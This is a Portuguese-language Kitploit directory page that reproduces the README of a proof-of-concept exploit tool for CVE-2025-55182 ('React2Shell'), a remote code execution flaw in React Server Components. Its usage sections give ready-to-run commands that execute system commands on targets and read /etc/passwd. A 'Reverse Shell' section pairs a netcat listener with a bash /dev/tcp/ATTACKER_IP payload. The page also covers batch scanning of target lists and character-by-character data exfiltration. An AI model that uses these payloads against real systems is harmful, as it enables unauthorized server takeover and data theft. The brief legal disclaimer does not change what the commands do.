Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Scanner de Execução Remota de Código para Componentes de Servidor React (RSC)

CVE Python


Créditos

FunçãoNomeLink
Pesquisa OriginalLachlan Davidsongithub.com/lachlan2k

Baseado no PoC original: React2Shell-CVE-2025-55182-original-poc


Visão Geral

React2Shell é um scanner de segurança abrangente para CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta implementações de Componentes de Servidor React (RSC). Esta vulnerabilidade permite que atacantes não autenticados executem código JavaScript arbitrário no servidor através de desserialização insegura no protocolo React Flight.

Principais Funcionalidades

  • Teste Multi-Variante: Testa 4 estruturas de payload diferentes da pesquisa original
  • Detecção de Versão: Identifica versões vulneráveis do React e de frameworks
  • Verificação de RCE: Confirma execução de código via variação de digest, temporização e callbacks OOB
  • Teste OOB: Suporte para Burp Collaborator e Interactsh
  • Payloads Personalizados: Executa JavaScript arbitrário em servidores vulneráveis
  • Extração de Dados: Exfiltração caractere por caractere
  • Saída Profissional: Saída colorida e limpa no terminal com coleta de evidências

Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Instale as dependências
pip install requests

# Execute o scanner
python3 exploit_cve_2025_55182_v2.py -h

Uso

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Modos de Varredura

1. Modo Versão (padrão)

Detecta passivamente versões vulneráveis do React e de frameworks:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Modo Verificação (-m verify)

Confirma ativamente RCE usando múltiplas técnicas e todas as 4 variantes de payload:

root@kitploit:~
# Verificação básica (variação de digest)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Com verificação baseada em tempo
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# Com callback OOB (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Verificação completa com saída detalhada
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Modo Personalizado (-m custom)

Executa payloads JavaScript arbitrários:

root@kitploit:~
# Obter versão do Node.js
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Executar comando no sistema
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Ler arquivo
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Varredura em Lote (-f)

Escaneia múltiplas URLs de um arquivo e exibe apenas alvos vulneráveis:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Exemplos

Varreduras Básicas

root@kitploit:~
# Detecção de versão (modo padrão)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# Verificação de RCE
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Varredura em lote de múltiplos alvos
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Saída detalhada
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Uso Avançado

root@kitploit:~
# Verificação baseada em tempo + OOB
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback seu-id.oastify.com

# Extrair informações do servidor
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Executar comando
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Iniciar listener
nc -lvnp 443

# Executar reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Aviso Legal

Esta ferramenta é fornecida apenas para fins de teste de segurança autorizados e educacionais.

  • Utilize apenas contra sistemas que você possui ou para os quais tem permissão explícita para testar
  • O acesso não autorizado a sistemas de computador é ilegal
  • Os autores não se responsabilizam pelo uso indevido desta ferramenta
  • Sempre siga práticas de divulgação responsável

Referências

  • CVE-2025-55182 - NVD
  • PoC Original por Lachlan Davidson
  • Aviso de Segurança do React
  • Aviso de Segurança do Next.js
  • Documentação dos Componentes de Servidor React
Baixar ferramenta
ArgumentoDescrição
-t, --targetURL alvo (ex.: https://example.com)
-f, --fileArquivo com lista de URLs (uma por linha) para varredura em lote
-m, --modeModo de varredura: version (padrão), verify ou custom
--jsCódigo JavaScript para modo custom
--extractExtrair resultado da string caractere por caractere
--sleep SECONDSVerificação RCE baseada em tempo (modo verify)
--callback URLURL de callback HTTP para teste OOB (modo verify)
--dns DOMAINDomínio de callback DNS para teste OOB (modo verify)
-v, --verboseSaída detalhada com detalhes do payload
--no-colorDesabilitar saída colorida
--timeout SECONDSTimeout da requisição HTTP (padrão: 30)